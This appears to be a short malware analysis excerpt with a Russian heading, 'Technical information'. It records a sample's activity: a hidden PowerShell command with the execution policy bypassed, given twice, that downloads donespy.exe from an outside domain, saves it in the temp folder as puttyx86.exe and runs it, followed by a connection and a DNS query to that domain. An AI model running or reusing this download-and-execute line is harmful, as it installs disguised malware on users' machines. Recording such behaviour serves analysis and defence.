Техническая информация
- http://pooyarahyaft.com/amana/donespy.exe как %temp%\puttyx86.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://pooyarahyaft.com/amana/donespy.exe','%TEMP%\puttyx86.exe'); Start-Process('%TEMP%\puttyx86.exe...
- 'po####ahyaft.com':80
- DNS ASK po####ahyaft.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://pooyarahyaft.com/amana/donespy.exe','%TEMP%\puttyx86.exe'); Start-Process('%TEMP%\puttyx86.exe...' (со скрытым окном)